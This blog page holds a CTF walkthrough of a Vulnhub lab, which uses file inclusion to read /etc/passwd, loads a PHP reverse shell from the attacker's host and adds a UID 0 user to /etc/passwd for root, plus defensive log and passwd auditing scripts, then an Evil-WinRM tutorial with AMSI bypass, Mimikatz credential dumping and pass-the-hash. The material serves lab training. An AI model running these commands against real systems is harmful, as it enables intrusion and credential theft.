Saturday, June 13, 2020

HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: Infinity Stones”. We have developed this lab for the purpose of online penetration practice. Solving this lab is not that tough if you have proper basic knowledge of penetration testing. Let’s start and learn how to breach it.
Download Here
Level: Intermediate
Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

  • Scanning Network
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Bruteforce
  • Exploitation
    • LFI
    • Create PHP reverse shell
    • Reading /etc/passwd file
    • Getting a reverse connection
    • Spawning a TTY Shell
  • Privilege Escalation
    • Writable /etc/passwd File

Walkthrough

Scanning Network

First of all, we try to identify our target, and for this we use the following command:
netdiscover
Now that we have identified our target using the above command, we can continue to our second step, which is scanning the target. We will use nmap to scan the target with the following command:
nmap -A 192.168.1.104

Enumeration

From the nmap scan, we now know that ports 22 and 80 are open, running SSH and HTTP respectively. Since port 80 is open, we open the target IP address in our browser as shown in the following image:
http://192.168.1.104
It opened a webpage as shown in the above image. Here we found a link to the Bhaskara page, so we opened it and found an information webpage there, as shown in the image below:
http://192.168.1.104/bhaskara.html
As a convention, we enumerate the webpage by going through its source code. There we see the Bhaskara Launch Code, which looks like base64-encoded text.
Now we need to decode it. To do this we pipe the output of the echo command into base64 -d.
echo "L2JoYXNrYXJh" | base64 -d
After decoding the base64-encoded text we get “/bhaskara”. This seems to be a hint that there might be a directory named bhaskara.
So we went to our browser to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. It is a 2MB file. After enumerating the file, we came to realize that it is a TrueCrypt file.
Now in order to crack this file, we are going to extract its hash using true.py. You can download true.py from this link. We named the file true.py, ran it against the container to produce the hash, and cracked the hash with John the Ripper, which gave us the password xavier.
python true.py bhaskara > hashes
john hashes --show
Now, as we knew it was a TrueCrypt file, it might be hiding something inside it. So we tried to open it using VeraCrypt by providing its path and selecting a volume, as shown in the given image.
Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier, i.e. ‘xavier’.
It opened up to show a text file labelled ‘flag.txt’. We opened it and it gave us our first flag, the Bhaskara Flag.
Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}
Now let’s move forward with enumeration. We also performed a directory scan, which gave us an /img directory. We then performed a directory scan with the .php extension, which gave us connect.php.
dirb http://192.168.1.104
dirb http://192.168.1.104 -X .php
We went into the /img directory. Here we found an image called aryabhata.jpg.
We downloaded aryabhata.jpg and opened it.
Upon opening it we found it to be the poster for the Aryabhata satellite, as shown in the image given below.
As we couldn’t find anything specific in the image, we suspected that steganography was involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag.
steghide extract -sf aryabhata.jpg
cat flag.txt
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back in the web browser, we also found connect.php in our dirb directory bruteforce. Opening it directly gave us nothing. Then we realized that its file parameter might be vulnerable to injection. To test this, we tried opening the /etc/passwd file through it. As seen in the image given below, it is a File Inclusion vulnerability.
192.168.1.104/connect.php?file=/etc/passwd
We edited our shell.php to enter the attacker machine's IP address, then saved and closed the file. Now we need to send this to the target machine. Hence, we started a Python HTTP server using the one-liner shown below.
nano shell.php
python -m SimpleHTTPServer
We are going to capture a reverse connection using netcat. So we need to start a listener on the port mentioned in the shell file.
nc -lvp 1234
After starting the listener on our attacking machine, we run the shell on the target machine using the File Inclusion vulnerability.
192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php
Upon execution, the shell gave us a session on the target machine. As seen in the image given below, it wasn’t a proper shell. So we needed a Python one-liner to convert it into a proper TTY shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
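As an added defender-side example that is not part of the original walkthrough, the following Python script scans Apache-style access log lines for the two request shapes used above: a `file=` parameter pointing at an absolute path or traversal sequence, and one pointing at a remote URL. The log lines, `SAMPLE_LOG` and the `find_inclusion_attempts` helper are constructed for this example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache-style access log lines modelled on the requests made in
# the walkthrough (connect.php?file=...). They are sample data, not real logs.
SAMPLE_LOG = """\
192.168.1.103 - - [13/Jun/2020:10:01:02 +0000] "GET /bhaskara.html HTTP/1.1" 200 812
192.168.1.103 - - [13/Jun/2020:10:02:15 +0000] "GET /connect.php?file=/etc/passwd HTTP/1.1" 200 1420
192.168.1.103 - - [13/Jun/2020:10:03:40 +0000] "GET /connect.php?file=http://192.168.1.103:8000/shell.php HTTP/1.1" 200 0
192.168.1.103 - - [13/Jun/2020:10:04:01 +0000] "GET /connect.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1420
192.168.1.103 - - [13/Jun/2020:10:05:22 +0000] "GET /img/aryabhata.jpg HTTP/1.1" 200 204811
"""

# Common log format: client, ident, user, [timestamp], "METHOD TARGET PROTOCOL"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

def classify_file_param(value: str) -> Optional[str]:
    """Classify one `file=` value as 'remote', 'local' or None (looks benign)."""
    v = unquote(value)  # parse_qs decoded once; this catches double encoding
    if re.match(r"^[a-z][a-z0-9+.\-]*://", v, re.I):
        return "remote"   # any URL scheme: the include would fetch remote code
    if v.startswith("/") or "../" in v or "..\\" in v or "\x00" in v:
        return "local"    # absolute path, directory traversal or null byte
    return None

def find_inclusion_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request whose file= parameter looks like LFI/RFI."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            kind = classify_file_param(value)
            if kind:
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "path": url.path, "kind": kind, "value": unquote(value)})
    return hits

if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["kind"]:6} {hit["path"]} file={hit["value"]}')
```

The same classifier can be pointed at a live access log by replacing `SAMPLE_LOG` with the file contents; a `remote` hit is the request that delivered the reverse shell in this walkthrough.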
We used the netstat command to check which IP addresses and ports the target machine is listening on, and found that a service on port 3306 is bound to localhost only. The most common service to run on port 3306 is MySQL. Let’s enumerate in that direction.
netstat -antp
We tried to log in to the MySQL database as the root user. After logging in to MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of the flag database. Here we found the Mangalyaan Flag.
mysql -u root 
show databases;
use flag;
show tables;
select * from flag;
Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As part of our enumeration for escalating privileges on the target machine, we check whether /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.
ls -la /etc/passwd
Now we are going to need the password hash for the user that we will create on the target machine by making an entry in the /etc/passwd file. We are going to use openssl to generate a salted hash.
openssl passwd -1 -salt user3 pass123
Now back to our remote shell on the target machine. Here we use the hash that we generated in the previous step to add a user raj with elevated privileges (UID 0). We used the echo command to append an entry to the /etc/passwd file, then checked the entry using the tail command. Now all we have to do is run the su command with the username we just created and enter the password, and we have a root shell. We traversed into the root directory to find our final flag, the Chandrayaan Flag.
echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
tail /etc/passwd
su raj
Password: pass123
cd /root
ls
cat final.txt
Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2} 
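As an added defender-side example that is not part of the original walkthrough, this Python script audits passwd-format content for exactly the artefacts the escalation above leaves behind (a hash in the password field instead of `x`, a second UID 0 account, and a non-root account homed in /root) and checks a file mode for the world-writable bit that made the technique possible. The sample entries, `audit_passwd` and `world_writable` are constructed for this example.

```python
import os
import stat
from typing import Dict, List

# Constructed /etc/passwd content. The last line mirrors the entry the
# walkthrough appends: a hash stored in field 2, UID 0 and home /root.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash
"""

def audit_passwd(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious entry in passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": lineno, "user": line, "issue": "malformed entry"})
            continue
        user, pw, uid, _gid, _gecos, home, _shell = fields
        if pw == "":
            findings.append({"line": lineno, "user": user, "issue": "empty password field"})
        elif pw not in ("x", "*", "!", "!!"):
            # A real hash here bypasses /etc/shadow; su accepts it directly.
            findings.append({"line": lineno, "user": user, "issue": "password hash in passwd"})
        if uid == "0" and user != "root":
            findings.append({"line": lineno, "user": user, "issue": "extra UID 0 account"})
        if home == "/root" and user != "root":
            findings.append({"line": lineno, "user": user, "issue": "non-root user homed in /root"})
    return findings

def world_writable(mode: int) -> bool:
    """True if the other-write bit is set (the condition the escalation relies on)."""
    return bool(mode & stat.S_IWOTH)

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f'line {f["line"]}: {f["user"]}: {f["issue"]}')
    if os.path.exists("/etc/passwd"):  # also audit the live file when run on a host
        print("/etc/passwd world-writable:", world_writable(os.stat("/etc/passwd").st_mode))
        for f in audit_passwd(open("/etc/passwd").read()):
            print(f'line {f["line"]}: {f["user"]}: {f["issue"]}')
```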

Wednesday, June 10, 2020

Evil-Winrm : Winrm Pentesting Framework


In this post, we will discuss the best-known framework for PowerShell remote shell access, named “Evil-Winrm”. It is an open-source tool, available on GitHub, for WinRM penetration testing.

Table of Content

  • Evil-winrm
  • Features
  • Installation
  • Load PowerShell scripts
  • Pass the Hash
  • Install using its Docker image

Evil-winrm

This program can be used on any Microsoft Windows server with this feature enabled (usually on port 5985), of course only if you have credentials and permissions to use it. So we can say that it is used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.
Features
  • Compatible with Linux and Windows client systems
  • Load PowerShell scripts in memory
  • Load DLL files in memory, bypassing some AVs
  • Load C# (C Sharp) assemblies in memory, bypassing some AVs
  • Load x64 payloads generated with awesome donut technique
  • AMSI Bypass
  • Pass-the-hash support
  • Kerberos auth support
  • SSL and certificates support
  • Upload and download files showing a progress bar
  • List remote machine services without privileges
  • Command History
  • WinRM command completion
  • Local files completion
  • Colorization on prompt and output messages (can be disabled optionally)
  • Docker support (prebuilt images available at Dockerhub)
  • Trap capturing to avoid accidental shell exit on Ctrl+C

Installation 

In this post, we discuss two easy methods to install evil-winrm in your Kali Linux; you will find more installation methods on GitHub.
With the help of Ruby gem, you can directly install evil-winrm; it will automatically install all dependencies on your machine when you execute the following command.
gem install evil-winrm
Once it is installed, you can pull up its help by typing ‘evil-winrm’, which will display the syntax and other options for running evil-winrm against the Windows Remote Management service.
Now, using evil-winrm, we try to access the remote machine's shell by connecting through port 5985, which is open for WinRM. As a result, it gives us access to the victim's shell by providing its PowerShell, as shown below.
Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'
It not only provides a shell on the host machine but also provides a menu to load functions such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.

Load PowerShell scripts

So we have some pentesting PowerShell scripts in /root/powershell, and we can upload these .ps1 scripts through evil-winrm to the host machine.
The .ps1 scripts must be in the path set with the -s argument; execute it as given below:
Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’> -s <path>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell
Type menu again to see the loaded functions, use Bypass 4MSI, then invoke the script. Here we have tried to upload the Mimikatz PowerShell script to dump stored credentials.
menu
Bypass 4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz
As a result, it has dumped all the credentials of the Windows Server.

Pass the Hash

It has one more feature which allows you to conduct a Pass the Hash attack, and as a result it gives a shell on the host machine.

Install using its Docker image

This is a very easy and convenient method to install evil-winrm on your attacking machine and simultaneously get a shell on the victim machine through its WinRM service. You only need to execute the following command.
docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'
